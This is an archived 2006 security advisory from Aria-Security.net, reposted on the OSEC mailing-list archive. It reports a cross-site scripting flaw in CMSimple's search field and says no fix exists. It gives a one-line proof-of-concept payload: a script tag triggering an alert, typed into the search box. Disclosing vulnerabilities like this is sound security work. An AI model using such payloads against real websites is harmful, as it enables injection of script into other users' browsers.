OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
CMSimple Cross Site Scripting

Outlawaria-security.net
Date: Thu Aug 03 2006 - 03:57:34 CDT


###############################################################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net> #
#Gr33t to: A.u.r.a & l2odon & R1D3N DrtRp & Cl0wn #
###############################################################
#Software: CMSimple
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/cmsimple.txt
#
#
#Proof of Concept:
#
# Search in: <script>alert(Aria-Security.Net)</script><!--
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#----------------------------------------------------------